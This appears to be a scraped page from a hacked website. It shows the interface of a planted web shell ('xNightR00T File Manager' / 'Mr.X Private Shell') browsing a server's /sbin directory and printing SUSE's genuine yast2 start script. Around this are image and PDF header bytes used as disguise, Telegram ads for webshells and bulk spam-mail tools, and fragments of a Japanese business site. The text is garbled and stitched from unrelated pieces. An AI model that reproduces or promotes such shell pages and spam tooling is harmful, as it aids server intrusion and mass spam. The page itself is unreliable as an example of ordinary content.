xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/bin/bash

# File:		/sbin/yast2
# Module:	yast2
# Summary:	Main YaST2 start script
# Authors:	Mathias Kettner <kettner@suse.de>
#		Klaus Kaempf <kkaempf@suse.de>
#		Ludwig Nussel <lnussel@suse.de>
#		Arvin Schnell <aschnell@suse.de>
#
# This script is called when the user just types 'yast2'. It starts
# the qt user interface in case the DISPLAY variable is set and other-
# wise ncurses. It starts then the module 'menu' which implements
# the configuration and administration menu.

# FATE#317637, bsc#877447: In installation system, we call the installer
# script directly and then exit
if [ -f /.instsys.config ]; then
  echo "Starting Installer"
  /usr/lib/YaST2/startup/YaST2.First-Stage
  exit $?
fi

export PATH=/sbin:/usr/sbin:$PATH

# make sure the system ruby is used, bnc#845897
unset GEM_HOME GEM_PATH RUBYLIB RUBYPATH RUBYOPT

# we need input methods for many locales bnc#776567
export QT_IM_MODULE=xim GTK_IM_MODULE=xim

# Do not load libproxy modules (config_kde4 module crashes because of Qt4/Qt5
# clash), empty path causes that the installed modules are not found. Sysconfig
# and envvar extensions are still loaded, /etc/sysconfig/proxy values are still
# used correctly (see bnc#866692 for details).
export PX_MODULE_PATH=""

# allow for a different prefix
# strip the basename off $0, which can be: (bnc#382216, bnc#458385)
# /sbin/yast2, /sbin/yast, yast2 (sh -x yast2 ...), /sbin/yast2 (PATH=/sbin/:...)
shopt -s extglob
mydir=${0%%*(/)[YyZz]a[Ss][Tt]?(2)}
if [[ -z "$mydir" || "$mydir" = /sbin || -n "$TESTING_YAST2" ]]; then
    YAST_PREFIX=/usr
else
    YAST_PREFIX=${mydir%/sbin}
fi

[[ -n "$TESTING_YAST2" ]] && YAST2FUNCS="$(dirname $0)/yast2-funcs" || YAST2FUNCS=$YAST_PREFIX/lib/YaST2/bin/yast2-funcs
# load common script functions
. $YAST2FUNCS


# check that system directories are non-empty - bnc #450643
mount_ok=1
check_mount_ok()
{
    if test -z `ls $1 2>/dev/null | head -n1`; then
        echo "The $1 filesystem is not mounted."
        mount_ok=0
    fi
}
check_mount_ok /proc
check_mount_ok /sys
check_mount_ok /dev
if test $mount_ok -eq 0 -a -z "$TESTING_YAST2"; then
    echo "If you are running in a chroot environment, bind-mount missing filesystems."
    exit 1
fi

exit_code=0

# Accumulated arguments for both the Qt UI and y2cc; currently supported:
# --fullscreen
# --noborder
# well also for gtk and ncurses
# add hints for ui about app name and icon
Y2UI_ARGS="-name YaST2 -icon yast"
GNOME_SHELL="$ybindir/y2controlcenter-gnome"
KDE_SHELL="$ybindir/y2controlcenter"

printhelp()
{
	echo "Usage: $0 [OPTIONS] [MODULE] [module specific parameters]"
	echo
	echo "OPTIONS:"
	echo "	-h, --help	this message"
	echo "	-l, --list	list all available modules"
	echo "	--qt            use the QT graphical user interface"
	echo "	--gtk           use the GTK graphical user interface"
	echo "	--ncurses       use the NCURSES text-mode user interface"
	echo "	-g, --geometry	default window size (qt only)"
	echo "	--noborder      no window manager border for main window"
	echo "	--fullscreen    use full screen"
	echo
}

listmodules()
{
    list=`/bin/ls -1 $YAST_PREFIX/share/applications/YaST2/*.desktop 2>/dev/null`

    if [ -z "$list" ] ; then
	echo "No modules installed"
    else
	echo "Available modules:"
	echo
	grep -h "X-SuSE-YaST-Call=" $list | \
	    sed 's|X-SuSE-YaST-Call=\([^ ]\+\)\( .*\)\?|\1|' | \
	    sort -u
    fi
}

# Probes for default desktop GUI
probe_desktop_gui()
{
    if [ "$DESKTOP_SESSION" = "gnome" -o \
         "$DESKTOP_SESSION" = "LXDE" -o \
         "$DESKTOP_SESSION" = "xfce" ]; then
	DESKTOP_GUI="gtk"
    elif echo $WINDOWMANAGER | grep -qi "\(gnome\|xfce|lxde\)"; then
	DESKTOP_GUI="gtk"
    else
	DESKTOP_GUI="qt"
    fi
    if [ "$DESKTOP_GUI" = "qt" -a ! -x "$KDE_SHELL" ]; then
	DESKTOP_GUI="gtk"
    fi
    if [ "$DESKTOP_GUI" = "gtk" -a ! -x "$GNOME_SHELL" ]; then
	DESKTOP_GUI="qt"
    fi
}

# Select which control center shell we want to use
select_control_center()
{
    # 'auto' detects desktop
    if [ "$WANTED_SHELL" = "auto" ]; then
	probe_desktop_gui
	WANTED_SHELL=$DESKTOP_GUI
    fi

    # select binary
    y2ccbin=""
    case "$WANTED_SHELL" in
	gtk)
            # gnome control center use different format of arguments (bsc#1058376)
            Y2UI_ARGS="--gtk-name=YaST2 --class=yast"
	    y2ccbin="$GNOME_SHELL"
	    ;;
	*)
	    y2ccbin="$KDE_SHELL"
	    ;;
    esac
}

# Select which toolkit we want to use (F#301083)
select_gui_frontend()
{
    if [ "$WANTED_GUI" = "auto" ]; then
	probe_desktop_gui
	WANTED_GUI=qt
	GUI_SELECTION=auto
    fi

    if [ "$WANTED_GUI" = "gtk" ]; then
	if check_qt; then
	    SELECTED_GUI=qt
	    WANTED_GUI=qt
	    if [ "$GUI_SELECTION" != "auto" ]; then
		echo >&2 "The GTK GUI has been retired, falling back to Qt."
	    fi
	else
	    echo >&2 "The GTK GUI has been retired, falling back to ncurses."
	fi
    elif [ "$WANTED_GUI" = "qt" ]; then
	if check_qt; then
	    SELECTED_GUI=qt
	else
	    echo >&2 "Qt GUI wanted but not found, falling back to ncurses."
	fi
    elif [ "$SELECTED_GUI" != "gtk" -a "$WANTED_GUI" != "ncurses" ]; then
	echo >&2 "Unknown GUI '$WANTED_GUI', falling back to ncurses."
    fi
}


SNAPPERBIN=/usr/bin/snapper

snapshot_pre()
{
    if [ "$1" != "menu" -a "$1" != "migration" ]; then
	if [ "$USE_SNAPPER" = "yes" -a -x $SNAPPERBIN ] ; then
	    SNAPSHOT_NUMBER=`$SNAPPERBIN create --type=pre --cleanup-algorithm=number --print-number --description="yast $1"`
	fi
    fi
}

snapshot_post()
{
    if [ "$1" != "menu" -a "$1" != "migration" ]; then
	if [ "$USE_SNAPPER" = "yes" -a -x $SNAPPERBIN ] ; then
	    $SNAPPERBIN create --type=post --cleanup-algorithm=number --pre-number=$SNAPSHOT_NUMBER
	fi
    fi
}

chef_is_running ()
{
  service chef-client status >/dev/null 2>&1
}

# ask user if he want to continue despite there is chef-client running
# return 0 if user decided to continue
chef_warning_continue ()
{
  $ybindir/y2start other_tools_warning --arg chef "$SELECTED_GUI" $Y2_GEOMETRY $Y2UI_ARGS
}

# Check if chef-client is running and warn user about it (bnc#803358)
# Returns 0 if user confirmed the conflict and wants to exit before starting YaST.
# (check for other tools (like puppet) may be added here)
other_tools_are_conflicting ()
{
  # - no need to check for installation/firstboot, they are started directly with y2start

  if ! chef_is_running; then
    return 1
  fi

  # existing arguments for yast module = CLI mode
  # continue, but print a warning
  if [ -n "$1"  ]; then
    echo "Warning: Chef Client is running. Your changes may be overridden by Chef later." >&2
    return 1
  fi

  if chef_warning_continue; then
    return 1
  fi
  return 0
}

TEMP=`/usr/bin/getopt -o hlg:s:Si --long help,list,kcontrol,geometry:,style:,strings,install,update,remove,fullscreen,noborder,qt,gtk,ncurses \
     -n 'yast2' -- "$@"`

if [ $? != 0 ] ; then echo "Exit." >&2 ; exit 1 ; fi

# Note the quotes around `$TEMP': they are essential!
eval set -- "$TEMP"

while true ; do
	case "$1" in
		-h|--help) if test "$2" = '--' -a -n "$3" ; then CMDLINE_HELP="help" ; else printhelp && exit 0 ; fi ; shift ;;
		-l|--list) listmodules; exit 0 ;;
		-g|--geometry) Y2_GEOMETRY="-geometry $2"; shift 2; ;;
		-i|--install) Y2_INSTALL_PACKAGES=true; Y2_INSTALL_ACTION=install; shift ;;
		--update) Y2_INSTALL_PACKAGES=true; Y2_INSTALL_ACTION=update; shift ;;
		--remove) Y2_INSTALL_PACKAGES=true; Y2_INSTALL_ACTION=remove; shift ;;
                --fullscreen) Y2UI_ARGS="$Y2UI_ARGS --fullscreen"; shift ;;
		--noborder)   Y2UI_ARGS="$Y2UI_ARGS --noborder"  ; shift ;;
		--kcontrol)   Y2UI_ARGS="$Y2UI_ARGS --kcontrol_id YaST" ; shift ;;
		--qt)  export CMDLINE_UI="qt"  ; shift ;;
		--gtk)  export CMDLINE_UI="gtk"  ; shift ;;
		--ncurses)  unset DISPLAY ; shift ;;
		--) shift ; break ;;
		*) echo "Unrecognized option $1" ; exit 1 ;;

	        # IMPORTANT: Remember to change that "getopt" call above, too
	        # if you change anything here!
	esac
done

# deprecated, drop after SLE12
if [ "$Y2_INSTALL_PACKAGES" = "true" ]; then
    if [ $# -eq 0 ]; then
        echo "DEPRECATED. Use sw_single directly: $0 sw_single" >&2
        export module="sw_single"
    else
        # support passing text files with packages
        # any ycp file support is dropped
        if [[ -f "$1" && ! "$1" == *rpm ]] ; then
          cmd="zypper --non-interactive $Y2_INSTALL_ACTION \`cat \"$1\"\`"
        else
          cmd="zypper --non-interactive $Y2_INSTALL_ACTION $@"
        fi

        echo "DEPRECATED. Use zypper directly: $cmd" >&2

        eval "$cmd"
        exit $?
    fi
else
	# allow module as argument, defaults to "menu"
	export module="${1-menu}"
	shift
fi

# Pass the arguments to client:

if [ -n "$CMDLINE_HELP" ]; then
    set -- $@ help;
fi
ARGS=( )
for i in "$@"; do
  ARGS+=( "--arg" )
  ARGS+=( "$i" )
done
set -- "${ARGS[@]}"

case "`basename $0`" in
	YaST|yast|yast1|zast)
		if [ -z "$CMDLINE_UI" ]; then
			unset DISPLAY;
		fi
	;;
esac

if [ "$UID" = 0 ]; then
    echo $$ > /var/run/yast.pid
fi

set_lang_from_sysconfig

# default defaults
WANTED_GUI="auto"
WANTED_SHELL="auto"
DESKTOP_GUI="qt"

# read system settings
if [ -f /etc/sysconfig/yast2 ]; then
    source /etc/sysconfig/yast2
fi
# read user settings
if [ -f "$HOME/.yast2/yast2" ]; then
    source "$HOME/.yast2/yast2"
fi

if [ -n "$CMDLINE_UI" ]; then
    WANTED_GUI="$CMDLINE_UI"
    WANTED_SHELL="$CMDLINE_UI"
fi

# Fallback GUI
SELECTED_GUI=ncurses
# if we have a DISPLAY, select a preferred GUI
if [ -n "$DISPLAY" ]; then
    select_gui_frontend
fi

if [ -n "$TESTING_YAST2" ]; then
  SELECTED_GUI="UI"
fi

if [ "$SELECTED_GUI" = "ncurses" ]; then
    if check_ncurses ; then
	TTY=$(/usr/bin/tty)
	TTY=${TTY#/dev/}
	case "$TTY" in
	    tty[0-9]|tty[0-9][0-9])
	        TTY=console
		;;
	esac

	# The part below has changed: we don't use 'testutf8' any longer, i.e.
	# don't start YaST in UTF-8 locale by default and don't fix the settings
	# in rxvt*|vt*|xterm*|linux|screen* (trust the locale).
	# See bnc#556555 and bnc#436378.
        if test "$TERM" = "linux" -a "$TTY" = "console" ; then
	    case "$LANG" in
		# if it is known that a language doesn't yet work well with ncurses
		# on console use English instead:
		ja*|ko*|zh*)
		    if test `locale charmap` = "UTF-8" ; then
			export LANG=en_US.UTF-8
			export LC_CTYPE=en_US.UTF-8
			export LC_ALL=en_US.UTF-8 # just to make sure.
		    else
			export LANG=en_US
			export LC_CTYPE=en_US
			export LC_ALL=en_US # just to make sure.
		    fi
		    ;;
	     esac
	fi

	# set color theme, if defined
	if [ -n "$Y2NCURSES_COLOR_THEME" ]; then
	    export Y2NCURSES_COLOR_THEME="$Y2NCURSES_COLOR_THEME"
	fi

    else
	rpm -V yast2-core yast2-ncurses yast2-qt yast2-gtk >&2
	echo "Something is wrong with the YaST user interface." >&2
	exit_code=1		# also skips y2start later
    fi
    if [ -n "$DISPLAY" -a ! -t 0 ]; then
	rpm -V yast2-core yast2-ncurses yast2-qt yast2-gtk >&2
	echo "Something is wrong with the YaST user interface, NCurses selected but no terminal available." >&2
	exit_code=1		# also skips y2start later
    fi
elif [ "$SELECTED_GUI" = "qt" ]; then

    set_qt_env

    # find which control center shell we want, if there is none we
    # fall back to the built-in ycp menu
    y2ccbin=""
    if [ $module == "menu" ]; then
	select_control_center
    fi
elif [ "$SELECTED_GUI" = "UI" ]; then
  echo "Testing UI only"
else
    echo >&2 "Internal error, unhandled '$SELECTED_GUI'"
fi


# do it!
# $@ are args for ycp
if [ $module == "menu" -a -x "$y2ccbin" ] ; then
    $y2ccbin $Y2UI_ARGS "$@"
    exit_code=$?
elif test $module != "menu" && other_tools_are_conflicting "$@" ; then
    exit_code=1
else
    # In case YaST has to be restarted, create this file
    # and exit. Script that creates the file should also
    # remove it itself.
    case "$module" in
	# special cases
	menu) REDO_FILE=/var/lib/YaST2/restart_menu ;;
	online_update) REDO_FILE=/var/lib/YaST2/selected_patches.ycp ;;
	# all other cases when YaST has to be restarted
	*) REDO_FILE=/var/lib/YaST2/restart_yast ;;
    esac
    snapshot_pre $module

    # remove the redo file if it already exists before starting the module,
    # avoid possible infinite loop (bsc#842910)
    rm -f "$REDO_FILE"

    #  break out on errors, #343258
    while [ $exit_code = 0 ]; do
	$ybindir/y2start $module "$@" "$SELECTED_GUI" $Y2_GEOMETRY $Y2UI_ARGS
	exit_code=$?
	if [ -z "$REDO_FILE" -o ! -f "$REDO_FILE" ]; then
	    break
	fi
    done
    snapshot_post $module

    # check the reboot flag
    if [ -f /var/lib/YaST2/reboot ];then
        rm -f /var/lib/YaST2/reboot
        /sbin/shutdown -r now
    fi
fi

if [ "$UID" = 0 ]; then
    rm -f /var/run/yast.pid
fi

exit $exit_code

Filemanager

Name Type Size Permission Actions
OCICLI File 441 B 0755
OneClickInstallCLI File 441 B 0755
OneClickInstallUI File 99 B 0755
OneClickInstallUrlHandler File 99 B 0755
SUSEfirewall2 File 84.6 KB 0755
SuSEfirewall2 File 84.6 KB 0755
adjtimex File 43.52 KB 0755
agetty File 58.19 KB 0755
analyzevmcore File 22.4 KB 0544
arp File 49.7 KB 0755
arping File 22.04 KB 0755
audispd File 38.18 KB 0750
auditctl File 42.23 KB 0750
auditd File 110.24 KB 0750
augenrules File 3.7 KB 0750
aureport File 98.16 KB 0755
ausearch File 106.17 KB 0755
autrace File 14.09 KB 0750
badblocks File 26.66 KB 0755
blkdeactivate File 14.49 KB 0555
blkid File 102.2 KB 0755
blockdev File 54.17 KB 0755
blogctl File 14.43 KB 0744
blogd File 55.48 KB 0744
blogger File 6.13 KB 0744
brcm_iscsiuio File 171.86 KB 0755
btrfs File 633.27 KB 0755
btrfs-convert File 352.66 KB 0755
btrfs-debug-tree File 316.2 KB 0755
btrfs-image File 340.34 KB 0755
btrfs-show-super File 316.41 KB 0755
btrfs-zero-log File 312.16 KB 0755
btrfsck File 633.27 KB 0755
btrfstune File 316.16 KB 0755
cfdisk File 90.53 KB 0755
chcpu File 38.09 KB 0755
checkproc File 39.65 KB 0755
chkbin File 12.84 KB 0544
chkconfig File 20.13 KB 0755
chkstat-polkit File 2.99 KB 0755
clockdiff File 18.24 KB 0755
crda File 18.52 KB 0755
cryptsetup File 91.71 KB 0755
ctrlaltdel File 34.1 KB 0755
debugfs File 187.7 KB 0755
debugfs.reiserfs File 71.15 KB 0755
debugreiserfs File 71.15 KB 0755
depmod File 236.71 KB 0755
dhclient File 1.78 MB 0755
dhclient-script File 24.49 KB 0754
dhclient6 File 1.78 MB 0755
dmevent_tool File 10.42 KB 0755
dmeventd File 38.17 KB 0555
dmraid File 20.87 KB 0755
dmsetup File 146.7 KB 0555
dmstats File 146.7 KB 0555
dosfsck File 54.58 KB 0755
dosfslabel File 50.57 KB 0755
dumpe2fs File 26.89 KB 0755
e2fsck File 289.48 KB 0755
e2image File 30.98 KB 0755
e2label File 99.89 KB 0755
e2undo File 18.55 KB 0755
ether-wake File 11.53 KB 0755
fbtest File 10.4 KB 0755
fdisk File 134.22 KB 0755
findfs File 10.09 KB 0755
fixfiles File 10.51 KB 0755
fsadm File 25.33 KB 0555
fsck File 46.14 KB 0755
fsck.btrfs File 1.16 KB 0755
fsck.cramfs File 34.13 KB 0755
fsck.ext2 File 289.48 KB 0755
fsck.ext3 File 289.48 KB 0755
fsck.ext4 File 289.48 KB 0755
fsck.fat File 54.58 KB 0755
fsck.minix File 106.2 KB 0755
fsck.msdos File 54.58 KB 0755
fsck.reiserfs File 164.47 KB 0755
fsck.vfat File 54.58 KB 0755
fsck.xfs File 433 B 0755
fsfreeze File 10.09 KB 0755
fstab-decode File 6.25 KB 0755
fstrim File 58.17 KB 0755
getappcore File 28.9 KB 0544
halt File 692.05 KB 0755
hdparm File 100.74 KB 0755
hwclock File 86.3 KB 0755
ifconfig File 62.05 KB 0755
ifdown File 5.82 KB 0755
ifenslave File 18.8 KB 0755
ifprobe File 5.82 KB 0755
ifstatus File 5.82 KB 0755
ifup File 5.82 KB 0755
ifuser File 10.34 KB 0755
in.rdisc File 22.13 KB 0755
init File 1.54 MB 0755
insmod File 236.71 KB 0755
insserv File 6.06 KB 0755
install-info File 39.63 KB 0755
installkernel File 2.59 KB 0755
ip File 498 KB 0755
ipmaddr File 18.45 KB 0755
iptunnel File 22.46 KB 0755
iscsi-gen-initiatorname File 2.1 KB 0755
iscsi-iname File 10.31 KB 0755
iscsi_discovery File 5.17 KB 0755
iscsi_fw_login File 212 B 0755
iscsi_offload File 9.22 KB 0755
iscsiadm File 776.52 KB 0755
iscsid File 796.85 KB 0755
iscsistart File 347.77 KB 0755
iscsiuio File 171.86 KB 0755
isserial File 6.21 KB 0744
kdump File 10.32 KB 0755
kexec File 255.5 KB 0755
key.dns_resolver File 18.45 KB 0755
killall5 File 22.66 KB 0755
killproc File 43.68 KB 0755
kpartx File 42.12 KB 0755
ldconfig File 872.55 KB 0755
load_policy File 10.3 KB 0755
logsave File 10.41 KB 0755
losetup File 98.76 KB 0755
lsmod File 236.71 KB 0755
lspci File 68.23 KB 0755
lvchange File 2.07 MB 0555
lvconvert File 2.07 MB 0555
lvcreate File 2.07 MB 0555
lvdisplay File 2.07 MB 0555
lvextend File 2.07 MB 0555
lvm File 2.07 MB 0555
lvmconf File 12.55 KB 0555
lvmconfig File 2.07 MB 0555
lvmdiskscan File 2.07 MB 0555
lvmdump File 10.07 KB 0555
lvmetad File 70.23 KB 0555
lvmpolld File 62.55 KB 0555
lvmsadc File 2.07 MB 0555
lvmsar File 2.07 MB 0555
lvreduce File 2.07 MB 0555
lvremove File 2.07 MB 0555
lvrename File 2.07 MB 0555
lvresize File 2.07 MB 0555
lvs File 2.07 MB 0555
lvscan File 2.07 MB 0555
mdadm File 554.64 KB 0755
mdmon File 305.23 KB 0755
mingetty File 22.8 KB 0755
mkdosfs File 27.06 KB 0755
mke2fs File 120.23 KB 0755
mkfs File 10.09 KB 0755
mkfs.bfs File 26.1 KB 0755
mkfs.btrfs File 332.27 KB 0755
mkfs.cramfs File 34.11 KB 0755
mkfs.ext2 File 120.23 KB 0755
mkfs.ext3 File 120.23 KB 0755
mkfs.ext4 File 120.23 KB 0755
mkfs.fat File 27.06 KB 0755
mkfs.minix File 94.19 KB 0755
mkfs.msdos File 27.06 KB 0755
mkfs.reiserfs File 23.04 KB 0755
mkfs.vfat File 27.06 KB 0755
mkfs.xfs File 423.13 KB 0755
mkhomedir_helper File 18.45 KB 0755
mkill File 39.71 KB 0755
mkinitrd File 12.84 KB 0755
mkinitrd_setup File 18 B 0755
mkreiserfs File 23.04 KB 0755
mkswap File 94.18 KB 0755
modinfo File 236.71 KB 0755
modprobe File 236.71 KB 0755
mount.cifs File 38.87 KB 0755
mount.crypt File 556 B 0755
mount.crypt_LUKS File 556 B 0755
mount.crypto_LUKS File 556 B 0755
mount.fuse File 10.32 KB 0755
mount.nfs File 112.29 KB 4755
mount.nfs4 File 112.29 KB 4755
mount.vmhgfs File 42.82 KB 0755
mpathpersist File 27 KB 0755
multipath File 30.09 KB 0755
multipathd File 114.15 KB 0755
nameif File 14.63 KB 0755
netconfig File 17.87 KB 0755
nfsdcltrack File 23 KB 0755
nologin File 10.09 KB 0755
osd_login File 2.55 KB 0755
pam_tally2 File 14.48 KB 0755
pam_timestamp_check File 10.42 KB 0755
pbl File 7.33 KB 0755
pidof File 22.66 KB 0755
pidofproc File 39.65 KB 0755
pivot_root File 10.1 KB 0755
plipconfig File 10.33 KB 0755
pmap_set2 File 6.09 KB 0755
poweroff File 692.05 KB 0755
purge-kernels File 10.28 KB 0755
pvchange File 2.07 MB 0555
pvck File 2.07 MB 0555
pvcreate File 2.07 MB 0555
pvdisplay File 2.07 MB 0555
pvmove File 2.07 MB 0555
pvremove File 2.07 MB 0555
pvresize File 2.07 MB 0555
pvs File 2.07 MB 0555
pvscan File 2.07 MB 0555
rarp File 24.77 KB 0755
raw File 14.09 KB 0755
rcSuSEfirewall2 File 5.28 KB 0755
rcipmi File 5.28 KB 0755
rcnetwork File 5.28 KB 0755
rcsyslog File 411 B 0755
reboot File 692.05 KB 0755
refresh_initrd File 1.08 KB 0755
regdbdump File 14.34 KB 0755
reiserfsck File 164.47 KB 0755
reiserfstune File 23.25 KB 0755
request-key File 18.48 KB 0755
resize2fs File 55.39 KB 0755
resize_reiserfs File 18.61 KB 0755
restorecon File 26.73 KB 0755
rmmod File 236.71 KB 0755
rmt File 34.83 KB 0755
route File 52.34 KB 0755
rpcbind File 50.34 KB 0755
rpcinfo File 26.26 KB 0755
rsyslogd File 602.45 KB 0755
runlevel File 692.05 KB 0755
rvmtab File 35.62 KB 0755
service File 5.28 KB 0755
set_polkit_default_privs File 2.62 KB 0755
setconsole File 14.53 KB 0744
setfiles File 26.73 KB 0755
setpci File 22.5 KB 0755
sfdisk File 122.17 KB 0755
showconsole File 14.53 KB 0744
shutdown File 692.05 KB 0755
slattach File 32.86 KB 0755
smart_agetty File 2.03 KB 0755
start_daemon File 55.96 KB 0755
startpar File 34.96 KB 0755
startproc File 55.96 KB 0755
supportconfig File 188.32 KB 0544
swaplabel File 14.09 KB 0755
swapoff File 18.09 KB 0755
swapon File 46.34 KB 0755
switch_root File 14.1 KB 0755
sysctl File 22.56 KB 0755
telinit File 692.05 KB 0755
tracepath File 14.04 KB 0755
tracepath6 File 14.04 KB 0755
tune2fs File 99.89 KB 0755
tunefs.reiserfs File 23.25 KB 0755
udevadm File 474.44 KB 0755
udevd File 482.48 KB 0755
umount.crypt File 556 B 0755
umount.crypt_LUKS File 556 B 0755
umount.crypto_LUKS File 556 B 0755
umount.nfs File 112.29 KB 4755
umount.nfs4 File 112.29 KB 4755
unix_chkpwd File 34.78 KB 4755
unix_update File 34.73 KB 0700
update-bootloader File 7.33 KB 0755
update-pciids File 1.87 KB 0755
vconfig File 14.31 KB 0755
vgcfgbackup File 2.07 MB 0555
vgcfgrestore File 2.07 MB 0555
vgchange File 2.07 MB 0555
vgck File 2.07 MB 0555
vgconvert File 2.07 MB 0555
vgcreate File 2.07 MB 0555
vgdisplay File 2.07 MB 0555
vgexport File 2.07 MB 0555
vgextend File 2.07 MB 0555
vgimport File 2.07 MB 0555
vgimportclone File 2.07 MB 0555
vgmerge File 2.07 MB 0555
vgmknodes File 2.07 MB 0555
vgreduce File 2.07 MB 0555
vgremove File 2.07 MB 0555
vgrename File 2.07 MB 0555
vgs File 2.07 MB 0555
vgscan File 2.07 MB 0555
vgsplit File 2.07 MB 0555
vhangup File 10.38 KB 0755
wipefs File 38.1 KB 0755
wiper.sh File 27.43 KB 0755
xfs_repair File 624.25 KB 0755
yast File 12.4 KB 0755
yast2 File 12.4 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
admin f – ページ 2 – Seiko Business Matching
12月 17, 2023
日本ASEAN友好協力50周年特別首脳会議および二国 […]
12月 14, 2023
特殊記事
詳細ウェブサイトへ
7月 25, 2023
特殊記事
詳細ウェブサイトへ
7月 11, 2023